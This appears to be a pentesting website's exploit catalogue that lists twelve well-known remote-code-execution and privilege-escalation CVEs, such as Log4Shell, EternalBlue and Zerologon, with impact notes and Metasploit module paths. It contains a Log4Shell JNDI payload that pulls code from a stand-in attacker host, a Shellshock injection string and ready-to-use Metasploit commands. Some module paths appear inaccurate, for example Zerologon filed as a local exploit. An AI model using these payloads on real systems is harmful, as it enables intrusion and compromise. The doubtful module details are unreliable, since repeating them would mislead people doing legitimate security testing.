logo

PenTest Hub

Your Ultimate Pentesting Arsenal

Exploit Database

Comprehensive collection of security exploits and proof-of-concepts

For authorized testing only
Educational purposes
Search & Filter Exploits
Exploit Statistics
12
Total Exploits
11
Critical Severity
4.6
Avg Rating
12
Filtered Results
Log4Shell (Log4j RCE)
CVE-2021-44228
CVE-2021-45046
4.9
critical
intermediate
Remote code execution vulnerability in Apache Log4j library allowing attackers to execute arbitrary code via JNDI lookup

Affected Platforms

Java
Linux
Windows
macOS
Discovered2021-12-09
AuthorChen Zhaojun

Affected Versions

Log4j 2.0-beta9 through 2.15.0

Impact

Remote Code Execution
Data Exfiltration
System Compromise

Exploit Code

${jndi:ldap://attacker.com/exploit}

Metasploit Module

exploit/multi/http/log4j_header_injection

Tags

#rce
#java
#log4j
#jndi
#ldap
EternalBlue (SMB RCE)
CVE-2017-0144
4.8
critical
intermediate
Remote code execution vulnerability in Microsoft SMBv1 server exploited by WannaCry ransomware

Affected Platforms

Windows
Discovered2017-03-14
AuthorNSA (leaked by Shadow Brokers)

Affected Versions

Windows Vista
Windows 7
+3 more versions

Impact

Remote Code Execution
Lateral Movement
Ransomware Deployment

Exploit Code

use exploit/windows/smb/ms17_010_eternalblue

Metasploit Module

exploit/windows/smb/ms17_010_eternalblue

Tags

#smb
#windows
#eternalblue
#wannacry
#nsa
Shellshock (Bash RCE)
CVE-2014-6271
CVE-2014-7169
4.7
critical
beginner
Command injection vulnerability in GNU Bash allowing remote code execution through environment variables

Affected Platforms

Linux
Unix
macOS
Discovered2014-09-24
AuthorStéphane Chazelas

Affected Versions

Bash 1.14 through 4.3

Impact

Remote Code Execution
Web Server Compromise
Data Access

Exploit Code

() { :; }; echo vulnerable

Metasploit Module

exploit/multi/http/apache_mod_cgi_bash_env_exec

Tags

#bash
#shellshock
#cgi
#environment
#injection
PrintNightmare (Windows Print Spooler)
CVE-2021-34527
CVE-2021-1675
4.6
critical
intermediate
Local privilege escalation and remote code execution in Windows Print Spooler service

Affected Platforms

Windows
Discovered2021-06-29
AuthorZhiniang Peng, Xuefeng Li

Affected Versions

Windows 7
Windows 8.1
+2 more versions

Impact

Privilege Escalation
Remote Code Execution
Domain Compromise

Exploit Code

use exploit/windows/local/cve_2021_1675_printnightmare

Metasploit Module

exploit/windows/local/cve_2021_1675_printnightmare

Tags

#windows
#print-spooler
#privilege-escalation
#rce
BlueKeep (RDP RCE)
CVE-2019-0708
4.5
critical
advanced
Remote code execution vulnerability in Microsoft Remote Desktop Services

Affected Platforms

Windows
Discovered2019-05-14
AuthorMicrosoft Security Response Center

Affected Versions

Windows XP
Windows Vista
+2 more versions

Impact

Remote Code Execution
System Compromise
Wormable Exploit

Exploit Code

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

Metasploit Module

exploit/windows/rdp/cve_2019_0708_bluekeep_rce

Tags

#rdp
#bluekeep
#windows
#remote-desktop
Zerologon (Netlogon Elevation)
CVE-2020-1472
4.8
critical
advanced
Privilege escalation vulnerability in Microsoft Netlogon Remote Protocol

Affected Platforms

Windows
Discovered2020-08-11
AuthorTom Tervoort (Secura)

Affected Versions

Windows Server 2008/2012/2016/2019

Impact

Domain Admin Privileges
Complete Domain Compromise
Credential Theft

Exploit Code

use exploit/windows/local/cve_2020_1472_zerologon

Metasploit Module

exploit/windows/local/cve_2020_1472_zerologon

Tags

#zerologon
#netlogon
#domain-controller
#privilege-escalation
ProxyLogon (Exchange Server)
CVE-2021-26855
CVE-2021-26857
CVE-2021-26858
CVE-2021-27065
4.7
critical
intermediate
Authentication bypass and remote code execution in Microsoft Exchange Server

Affected Platforms

Windows
Exchange
Discovered2021-03-02
AuthorDEVCORE Research Team

Affected Versions

Exchange Server 2013
Exchange Server 2016
+1 more versions

Impact

Remote Code Execution
Email Access
Webshell Deployment

Exploit Code

use exploit/windows/http/exchange_proxylogon_rce

Metasploit Module

exploit/windows/http/exchange_proxylogon_rce

Tags

#exchange
#proxylogon
#authentication-bypass
#webshell
Drupalgeddon2 (Drupal RCE)
CVE-2018-7600
4.4
critical
beginner
Remote code execution vulnerability in Drupal core allowing unauthenticated attacks

Affected Platforms

PHP
Linux
Windows
Discovered2018-03-28
AuthorDrupal Security Team

Affected Versions

Drupal 6.x
Drupal 7.x
+1 more versions

Impact

Remote Code Execution
Website Defacement
Data Theft

Exploit Code

use exploit/unix/webapp/drupal_drupalgeddon2

Metasploit Module

exploit/unix/webapp/drupal_drupalgeddon2

Tags

#drupal
#cms
#unauthenticated
#form-api
Apache Struts2 RCE
CVE-2017-5638
4.3
critical
intermediate
Remote code execution in Apache Struts2 via Content-Type header manipulation

Affected Platforms

Java
Linux
Windows
Discovered2017-03-06
AuthorNike Zheng

Affected Versions

Struts 2.3.5 - 2.3.31
Struts 2.5 - 2.5.10

Impact

Remote Code Execution
Server Compromise
Data Breach

Exploit Code

use exploit/multi/http/struts2_content_type_ognl

Metasploit Module

exploit/multi/http/struts2_content_type_ognl

Tags

#struts2
#ognl
#content-type
#java
Pulse Secure VPN RCE
CVE-2019-11510
4.6
critical
intermediate
Arbitrary file reading vulnerability in Pulse Secure VPN leading to RCE

Affected Platforms

Linux
Discovered2019-04-24
AuthorOrange Tsai

Affected Versions

Pulse Connect Secure 8.2R1 - 8.2R12
Pulse Connect Secure 8.3R1 - 8.3R7

Impact

Remote Code Execution
VPN Compromise
Network Access

Exploit Code

use exploit/linux/http/pulse_secure_cmd_exec

Metasploit Module

exploit/linux/http/pulse_secure_cmd_exec

Tags

#pulse-secure
#vpn
#file-read
#path-traversal
SMBGhost (SMBv3 RCE)
CVE-2020-0796
4.5
critical
advanced
Remote code execution vulnerability in Microsoft SMBv3 protocol

Affected Platforms

Windows
Discovered2020-03-12
AuthorMicrosoft Security Response Center

Affected Versions

Windows 10 1903/1909
Windows Server 1903/1909

Impact

Remote Code Execution
System Compromise
Lateral Movement

Exploit Code

use exploit/windows/smb/cve_2020_0796_smbghost

Metasploit Module

exploit/windows/smb/cve_2020_0796_smbghost

Tags

#smbv3
#smbghost
#compression
#windows10
MSHTML RCE (Office/IE)
CVE-2021-40444
4.2
high
intermediate
Remote code execution vulnerability in MSHTML component used by Office and Internet Explorer

Affected Platforms

Windows
Discovered2021-09-07
AuthorExpmon

Affected Versions

Windows 7/8.1/10/11
Windows Server 2008/2012/2016/2019/2022

Impact

Remote Code Execution
Initial Access
Phishing Campaigns

Exploit Code

use exploit/windows/fileformat/office_mshtml_rce

Metasploit Module

exploit/windows/fileformat/office_mshtml_rce

Tags

#mshtml
#office
#activex
#cab-file